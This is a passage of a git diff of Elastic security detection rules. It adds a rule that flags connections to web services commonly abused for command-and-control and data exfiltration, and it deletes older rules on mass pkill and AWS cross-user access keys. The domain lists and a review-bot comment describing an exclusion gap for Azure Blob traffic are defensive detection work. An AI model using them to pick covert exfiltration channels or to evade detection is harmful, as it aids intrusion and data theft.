@@ -0,0 +1,160 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Adversaries may implement command and control (C2) communications that use common web services to hide their activity. This attack technique is typically targeted at an organization and uses web services common to the victim network, which allows the adversary to blend into legitimate traffic activity. These popular services are typically targeted since they have most likely been used before compromise, which helps malicious traffic blend in.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.network-*", + "logs-sentinel_one_cloud_funnel.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Connection to Commonly Abused Web Services", + "note": "## Triage and analysis\n\n### Investigating Connection to Commonly Abused Web Services\n\nAdversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise.\n\nThis rule looks for processes outside known legitimate program locations communicating with a list of services that can be abused for exfiltration or command and control.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses the [Investigate Markdown Plugin](https://www.elastic.co/guide/en/security/current/interactive-investigation-guides.html) introduced in Elastic Stack version 8.8.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - !{investigate{\"label\":\"Alerts associated with the user in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"user.id\",\"queryType\":\"phrase\",\"value\":\"{{user.id}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n - !{investigate{\"label\":\"Alerts associated with the host in the last 48h\",\"providers\":[[{\"excluded\":false,\"field\":\"event.kind\",\"queryType\":\"phrase\",\"value\":\"signal\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"host.name\",\"queryType\":\"phrase\",\"value\":\"{{host.name}}\",\"valueType\":\"string\"}]],\"relativeFrom\":\"now-48h/h\",\"relativeTo\":\"now\"}}\n- Verify whether the digital signature exists in the executable.\n- Identify the operation type (upload, download, tunneling, etc.).\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - !{investigate{\"label\":\"Investigate the Subject Process Network 
Events\",\"providers\":[[{\"excluded\":false,\"field\":\"event.category\",\"queryType\":\"phrase\",\"value\":\"network\",\"valueType\":\"string\"},{\"excluded\":false,\"field\":\"process.entity_id\",\"queryType\":\"phrase\",\"value\":\"{{process.entity_id}}\",\"valueType\":\"string\"}]]}}\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives because it detects communication with 
legitimate services. Noisy false positives can be added as exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "network where host.os.type == \"windows\" and\n dns.question.name != null and process.name != null and\n not (?user.id in (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") or user.domain == \"NT AUTHORITY\") and\n /* Add new WebSvc domains here */\n dns.question.name :\n (\n \"raw.githubusercontent.*\",\n \"pastebin.*\",\n \"paste4btc.com\",\n \"paste.ee\",\n \"ghostbin.com\",\n \"drive.google.com\",\n \"?.docs.live.net\",\n \"api.dropboxapi.*\",\n \"content.dropboxapi.*\",\n \"dl.dropboxusercontent.*\",\n \"api.onedrive.com\",\n \"*.onedrive.org\",\n \"onedrive.live.com\",\n \"filebin.net\",\n \"*.ngrok.io\",\n \"ngrok.com\",\n \"*.portmap.*\",\n \"*serveo.net\",\n \"*localtunnel.me\",\n \"*pagekite.me\",\n \"*localxpose.io\",\n \"*notabug.org\",\n \"rawcdn.githack.*\",\n \"paste.nrecom.net\",\n 
\"zerobin.net\",\n \"controlc.com\",\n \"requestbin.net\",\n \"slack.com\",\n \"api.slack.com\",\n \"slack-redir.net\",\n \"slack-files.com\",\n \"cdn.discordapp.com\",\n \"discordapp.com\",\n \"discord.com\",\n \"apis.azureedge.net\",\n \"cdn.sql.gg\",\n \"?.top4top.io\",\n \"top4top.io\",\n \"www.uplooder.net\",\n \"*.cdnmegafiles.com\",\n \"transfer.sh\",\n \"gofile.io\",\n \"updates.peer2profit.com\",\n \"api.telegram.org\",\n \"t.me\",\n \"meacz.gq\",\n \"rwrd.org\",\n \"*.publicvm.com\",\n \"*.blogspot.com\",\n \"api.mylnikov.org\",\n \"file.io\",\n \"stackoverflow.com\",\n \"*files.1drv.com\",\n \"api.anonfile.com\",\n \"*hosting-profi.de\",\n \"ipbase.com\",\n \"ipfs.io\",\n \"*up.freeo*.space\",\n \"api.mylnikov.org\",\n \"script.google.com\",\n \"script.googleusercontent.com\",\n \"api.notion.com\",\n \"graph.microsoft.com\",\n \"*.sharepoint.com\",\n \"mbasic.facebook.com\",\n \"login.live.com\",\n \"api.gofile.io\",\n \"api.anonfiles.com\",\n \"api.notion.com\",\n \"api.trello.com\",\n \"gist.githubusercontent.com\",\n \"files.pythonhosted.org\",\n \"g.live.com\",\n \"*.zulipchat.com\",\n \"webhook.site\",\n \"run.mocky.io\",\n \"mockbin.org\", \n \"*googleapis.com\", \n \"global.rel.tunnels.api.visualstudio.com\",\n \"*.devtunnels.ms\",\n \"api.github.com\",\n \"*.blob.core.windows.net\",\n \"*.blob.storage.azure.net\",\n \"files.catbox.moe\",\n \"*.supabase.co\", \n \"*.elastic-cloud.com\",\n \"*.cloud.es.io\") and\n \n /* Insert noisy false positives here */\n not (\n (\n process.executable : (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\BraveSoftware\\\\*\\\\Application\\\\brave.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe\",\n 
\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Opera*\\\\opera.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Fiddler\\\\Fiddler.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\PowerToys\\\\PowerToys.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Vivaldi\\\\Application\\\\vivaldi.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Zen Browser\\\\zen.exe\",\n \"?:\\\\Users\\\\*\\\\Wavesor Software\\\\WaveBrowser\\\\wavebrowser.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\Windows\\\\system32\\\\mobsync.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\mobsync.exe\", \n \"?:\\\\Windows\\\\system32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\smartscreen.exe\",\n \"?:\\\\Windows\\\\System32\\\\wsl.exe\", \n \"?:\\\\Windows\\\\System32\\\\WWAHost.exe\"\n )\n ) or\n \n /* Discord App */\n (process.name : \"Discord.exe\" and (process.code_signature.subject_name : \"Discord Inc.\" and\n process.code_signature.trusted == true) and dns.question.name : (\"discord.com\", \"cdn.discordapp.com\", \"discordapp.com\")\n ) or \n\n /* MS Sharepoint / OneDrive */\n (process.name : (\"Microsoft.SharePoint.exe\", \"OneDrive.Sync.Service.exe\") and dns.question.name : \"onedrive.live.com\" and\n (process.code_signature.subject_name : \"Microsoft Corporation\" and process.code_signature.trusted == true)\n ) or \n\n /* Obsidian - Plugins are stored on raw.githubusercontent.com */\n (process.name : \"Obsidian.exe\" and (process.code_signature.subject_name : \"Dynalist Inc\" and\n process.code_signature.trusted == true) and dns.question.name : \"raw.githubusercontent.com\"\n ) or \n\n /* WebExperienceHostApp */\n (process.name : \"WebExperienceHostApp.exe\" and (process.code_signature.subject_name : \"Microsoft Windows\" and\n process.code_signature.trusted == true) and dns.question.name : (\"onedrive.live.com\", \"skyapi.onedrive.live.com\")\n ) or\n\n /* IntelliJ IDEA connecting to raw.githubusercontent.com */\n 
(process.code_signature.subject_name : \"JetBrains s.r.o.\" and\n process.code_signature.trusted == true and dns.question.name : (\"api.github.com\", \"raw.githubusercontent.com\")\n ) or \n\n (process.code_signature.subject_name : \"Microsoft *\" and process.code_signature.trusted == true and\n dns.question.name : (\"*.sharepoint.com\", \"graph.microsoft.com\", \"g.live.com\", \"login.live.com\",\n \"*.blob.core.windows.net\", \"*.blob.storage.azure.net\")\n ) or\n\n (process.code_signature.subject_name : (\"Python Software Foundation\", \"Anaconda, Inc.\") and\n process.code_signature.trusted == true and dns.question.name : \"files.pythonhosted.org\"\n ) or\n\n /* Zoom */\n (process.name : \"Zoom.exe\" and (\n process.code_signature.subject_name : (\"Zoom Video Communications, Inc.\", \"Zoom Communications, Inc.\") and\n process.code_signature.trusted == true) and dns.question.name : (\"www.googleapis.com\", \"graph.microsoft.com\")\n ) or\n\n /* VSCode */\n (process.name : \"Code.exe\" and (process.code_signature.subject_name : \"Microsoft Corporation\" and\n process.code_signature.trusted == true) and dns.question.name : (\"api.github.com\", \"raw.githubusercontent.com\")\n ) or\n\n /* Terraform */\n (process.name : \"terraform-provider*.exe\" and (process.code_signature.subject_name : \"HashiCorp, Inc.\" and\n process.code_signature.trusted == true) and dns.question.name : \"graph.microsoft.com\"\n ) or\n\n (\n process.code_signature.trusted == true and\n process.code_signature.subject_name : (\n \"Johannes Schindelin\",\n \"Redis Inc.\",\n \"Slack Technologies, LLC\",\n \"Cisco Systems, Inc.\",\n \"Dropbox, Inc\",\n \"Amazon.com Services LLC\", \n \"Island Technology Inc.\", \n \"GitHub, Inc.\", \n \"Red Hat, Inc\",\n \"Mozilla Corporation\"\n )\n )\n )\n", + "references": [ + "https://www.elastic.co/security-labs/operation-bleeding-bear", + "https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry", + 
"https://specterops.io/blog/2026/01/30/weaponizing-whitelists-an-azure-blob-storage-mythic-c2-profile/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dns.question.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "66883649-f908-4a5b-a1e0-54090a1d3a32", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: SentinelOne" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1102", + "name": "Web Service", + "reference": "https://attack.mitre.org/techniques/T1102/" + }, + { + "id": "T1568", + "name": "Dynamic Resolution", + "reference": "https://attack.mitre.org/techniques/T1568/", + "subtechnique": [ + { + "id": "T1568.002", + "name": "Domain Generation Algorithms", + "reference": "https://attack.mitre.org/techniques/T1568/002/" + } + ] + }, + { + "id": "T1090", + "name": "Proxy", + "reference": "https://attack.mitre.org/techniques/T1090/", + "subtechnique": [ + { + "id": "T1090.002", + "name": "External Proxy", + "reference": 
"https://attack.mitre.org/techniques/T1090/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1567", + "name": "Exfiltration Over Web Service", + "reference": "https://attack.mitre.org/techniques/T1567/", + "subtechnique": [ + { + "id": "T1567.001", + "name": "Exfiltration to Code Repository", + "reference": "https://attack.mitre.org/techniques/T1567/001/" + }, + { + "id": "T1567.002", + "name": "Exfiltration to Cloud Storage", + "reference": "https://attack.mitre.org/techniques/T1567/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 127 + }, + "id": "66883649-f908-4a5b-a1e0-54090a1d3a32_127", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_114.json b/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_114.json deleted file mode 100644 index 5bd6f588432..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_114.json +++ /dev/null 
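Review bot: The `dns.question.name` list in the new query carries duplicate entries — `"api.mylnikov.org"` and `"api.notion.com"` each appear twice — and a few entries (`"mockbin.org", `, `"*googleapis.com", `, `"*.supabase.co", `) end with trailing whitespace before the newline; dropping the repeats and the stray spaces keeps the list diff-friendly without changing what it matches. On the detection side, the clause `process.code_signature.subject_name : "Microsoft *" and process.code_signature.trusted == true and dns.question.name : (… "*.blob.core.windows.net", "*.blob.storage.azure.net")` appears to exempt every trusted Microsoft-signed process, including the OS's own scripting and download utilities, for exactly the Azure Blob destinations that the newly added SpecterOps reference describes as a C2 channel. If those two blob domains are what version 127 introduces, consider narrowing that clause to the specific sync/update processes that legitimately use blob storage, or at least marking the accepted gap with a `/* … */` comment beside it as the other exclusions do. The whole file is new in this diff, so the previous version's list is not visible here and the duplication may predate this change.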
@@ -1,101 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule identifies a high number (10) of process terminations via pkill from the same host within a short time period.", - "from": "now-9m", - "index": [ - "logs-endpoint.events.*", - "endgame-*", - "auditbeat-*", - "logs-auditd_manager.auditd-*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "High Number of Process Terminations", - "note": "## Triage and analysis\n\n### Investigating High Number of Process Terminations\n\nAttackers can kill processes for a variety of purposes. For example, they can kill process associated with business applications and databases to release the lock on files used by these applications so they may be encrypted,or stop security and backup solutions, etc.\n\nThis rule identifies a high number (10) of process terminations via pkill from the same host within a short time period.\n\n#### Possible investigation steps\n\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user.\n- Examine the contents of session leading to the process termination(s) via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities.\n- Examine the process killed during the malicious execution\n - Identify imment threat to the system from the process killed.\n - Take necessary incident response actions to respawn necessary process.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further destructive behavior, which is commonly associated with this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Reimage the host operating system or restore it to the operational state.\n- If any other destructive action was identified on the host, it is recommended to prioritize the investigation and look for ransomware preparation and execution activities.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "event.category:process and host.os.type:linux and event.type:start and process.name:\"pkill\" and process.args:\"-f\"\n", - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - }, - { - "package": "auditd_manager", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.args", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "67f8443a-4ff3-4a70-916d-3cfa3ae9f02b", - "setup": "## Setup\n\nThis rule 
requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Impact", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Auditd Manager" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0040", - "name": "Impact", - "reference": "https://attack.mitre.org/tactics/TA0040/" - }, - "technique": [ - { - "id": "T1489", - "name": "Service Stop", - "reference": "https://attack.mitre.org/techniques/T1489/" - } - ] - } - ], - "threshold": { - "field": [ - "host.id", - "process.executable", - "user.name" - ], - "value": 10 - }, - "timestamp_override": "event.ingested", - "type": "threshold", - "version": 114 - }, - "id": "67f8443a-4ff3-4a70-916d-3cfa3ae9f02b_114", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/696015ef-718e-40ff-ac4a-cc2ba88dbeeb_9.json b/packages/security_detection_engine/kibana/security_rule/696015ef-718e-40ff-ac4a-cc2ba88dbeeb_9.json deleted file mode 100644 index 95490104490..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/696015ef-718e-40ff-ac4a-cc2ba88dbeeb_9.json +++ /dev/null 
@@ -1,258 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "An adversary with access to a set of compromised credentials may attempt to persist or escalate privileges by creating a new set of credentials for an existing user. This rule looks for use of the IAM `CreateAccessKey` API operation to create new programmatic access keys for another IAM user.", - "false_positives": [ - "While this can be normal behavior, it should be investigated to ensure validity. Verify whether the user identity should be using the IAM `CreateAccessKey` for the targeted user." - ], - "from": "now-6m", - "investigation_fields": { - "field_names": [ - "@timestamp", - "user.name", - "user_agent.original", - "source.ip", - "aws.cloudtrail.user_identity.arn", - "aws.cloudtrail.user_identity.type", - "aws.cloudtrail.user_identity.access_key_id", - "user.target.name", - "event.action", - "event.outcome", - "cloud.region", - "cloud.account.id", - "aws.cloudtrail.request_parameters", - "aws.cloudtrail.response_elements" - ] - }, - "language": "esql", - "license": "Elastic License v2", - "name": "AWS IAM User Created Access Keys For Another User", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n\n### Investigating AWS IAM User Created Access Keys For Another User\n\nAWS IAM access keys are long-term credentials that grant programmatic access to AWS resources. The `iam:CreateAccessKey` permission allows an IAM principal to generate new access keys for an existing IAM user. 
\nWhile this operation can be legitimate (for example, credential rotation), it can also be abused to establish persistence or privilege escalation if one user creates keys for another account without authorization.\n\nThis rule identifies `CreateAccessKey` API calls where the calling user (`aws.cloudtrail.user_identity.arn`) differs from the target user (`aws.cloudtrail.request_parameters.userName`), indicating one IAM identity creating credentials for another.\n\n#### Possible investigation steps\n\n- **Confirm both user identities and intent.** \n Identify the calling user (who performed `CreateAccessKey`) and the target user (whose access key was created). Contact both account owners or application teams to confirm if this operation was expected.\n\n- **Review CloudTrail event details.** \n Check the following fields directly in the alert or corresponding CloudTrail record: \n - `source.ip` \u2014 does it align with expected corporate ranges or known admin automation? \n - `user_agent.original` \u2014 AWS Console, CLI, SDK, or custom client? Unexpected user agents (for example, non-SDK scripts) may indicate manual or unauthorized use. \n - `source.geo` fields \u2014 verify the location details are expected for the identity.\n\n- **Correlate with related IAM activity.** \n In CloudTrail, search for subsequent or nearby events such as: \n - `AttachUserPolicy`, `AttachGroupPolicy`, `UpdateAssumeRolePolicy`, or `CreateUser`. \n These can indicate privilege escalation or lateral movement. \n Also review whether the same principal recently performed `CreateAccessKey` for multiple users or repeated this action across accounts.\n\n- **Inspect the new access key\u2019s usage.** \n Search for the newly created key ID (`aws.cloudtrail.response_elements.accessKey.accessKeyId`) in CloudTrail events following creation. Determine if it was used from unusual IP addresses, geographies, or services. 
\n\n- **Assess the risk of credential compromise.** \n If you suspect malicious behavior, consider the following indicators: \n - A non-admin user invoking `CreateAccessKey` for another user. \n - Creation outside of normal automation pipelines. \n - Use of the new key from a different IP or AWS account soon after creation.\n\n- **Scope related activity.** \n Review all activity from the calling user in the past 24\u201348 hours, focusing on `iam:*` API calls and resource creation events. \n Correlate any S3, EC2, or KMS access attempts made using the new key to identify potential impact or data exposure.\n\n### False positive analysis\n\n- **Expected credential rotation.** \n Some environments delegate credential rotation responsibilities to centralized automation or specific admin roles. Confirm if the calling user is authorized for such actions. \n- **Administrative workflows.** \n Account provisioning systems may legitimately create keys on behalf of users. Check for standard tags, automation tools, or user agents that indicate managed operations. \n- **Service-linked roles or external IAM automation.** \n Some AWS services create or rotate credentials automatically. Validate if the caller is a service-linked role or an automation IAM role used by a known deployment process.\n\n### Response and remediation\n\n> AWS IR playbooks classify unauthorized credential creation as a **Priority-1 incident** because it may allow persistence or privilege escalation. \n> The following steps scale for organizations with or without a dedicated IR team.\n\n**1. Immediate containment**\n- Deactivate or delete the access key from the target IAM user immediately using the AWS Console, CLI, or API (`DeleteAccessKey`). \n- Rotate or reset credentials for both the calling and target users to eliminate possible compromise. \n- Restrict risky principals. 
Temporarily deny `iam:CreateAccessKey` and `iam:UpdateAccessKey` permissions for non-administrative roles while scoping the incident. \n- Enable or confirm MFA on both accounts involved, if not already enforced.\n\n**2. Evidence preservation**\n- Export all related `CreateAccessKey`, `DeleteAccessKey`, and `UpdateAccessKey` events within \u00b130 minutes of the alert to an evidence bucket. \n- Preserve CloudTrail, GuardDuty, and AWS Config data for the same period. \n- Record key event details: caller ARN, target user, `accessKeyId`, `source.ip`, `userAgent`, and timestamps.\n\n**3. Scoping and investigation**\n- Search CloudTrail for usage of the new access key ID after creation. Identify any API activity or data access tied to it. \n- Review IAM policy changes, group modifications, or new role assumptions around the same time. \n- Determine if any additional credentials or trust policy changes were made by the same actor. \n- Check for GuardDuty findings referencing anomalous credential usage or suspicious API behavior.\n\n**4. Recovery and hardening**\n- Remove or disable any unauthorized keys and re-enable only verified credentials. \n- Implement least-privilege IAM policies to limit which users can perform `CreateAccessKey`. \n- Monitor for future `CreateAccessKey` events where `userIdentity.arn != request_parameters.userName`. \n- Ensure Cloudtrail, GuardDuty and Security Hub are active across all regions. \n- Educate administrative users on secure key rotation processes and the risk of cross-user key creation. \n\n### Additional information\n\n- **[AWS IR Playbooks](https://github.com/aws-samples/aws-incident-response-playbooks/blob/c151b0dc091755fffd4d662a8f29e2f6794da52c/playbooks/):** Reference \u201cCredential Compromise\u201d and \u201cIAM Misuse\u201d procedures for containment and recovery. 
\n- **[AWS Customer Playbook Framework](https://github.com/aws-samples/aws-customer-playbook-framework/):** See \u201cIdentity Access Review\u201d and \u201cUnauthorized Access Key Creation\u201d for example response flows. \n- **AWS Documentation:** [Best practices for managing access keys](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_access-keys.html). \n- **Security Best Practices:** [AWS Knowledge Center \u2013 Security Best Practices](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/). \n", - "query": "from logs-aws.cloudtrail-* metadata _id, _version, _index\n| where event.dataset == \"aws.cloudtrail\"\n and event.provider == \"iam.amazonaws.com\"\n and event.action == \"CreateAccessKey\"\n and event.outcome == \"success\"\n and user.name != user.target.name\n| keep\n @timestamp,\n cloud.account.id,\n cloud.region,\n event.provider,\n event.action,\n event.outcome,\n event.dataset,\n user.name,\n source.address,\n source.ip,\n user.target.name,\n user_agent.original,\n aws.cloudtrail.request_parameters,\n aws.cloudtrail.response_elements,\n aws.cloudtrail.user_identity.arn,\n aws.cloudtrail.user_identity.type,\n aws.cloudtrail.user_identity.access_key_id,\n source.geo.*\n", - "references": [ - "https://hackingthe.cloud/aws/exploitation/iam_privilege_escalation/#iamcreateaccesskey", - "https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence", - "https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud", - "https://docs.aws.amazon.com/IAM/latest/APIReference/API_CreateAccessKey.html" - ], - "related_integrations": [ - { - "package": "aws", - "version": "^4.0.0" - }, - { - "integration": "cloudtrail", - "package": "aws", - "version": "^4.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "@timestamp", - "type": "date" - }, - { - "ecs": false, - "name": "aws.cloudtrail.request_parameters", - "type": "keyword" - }, - { - "ecs": false, - "name": 
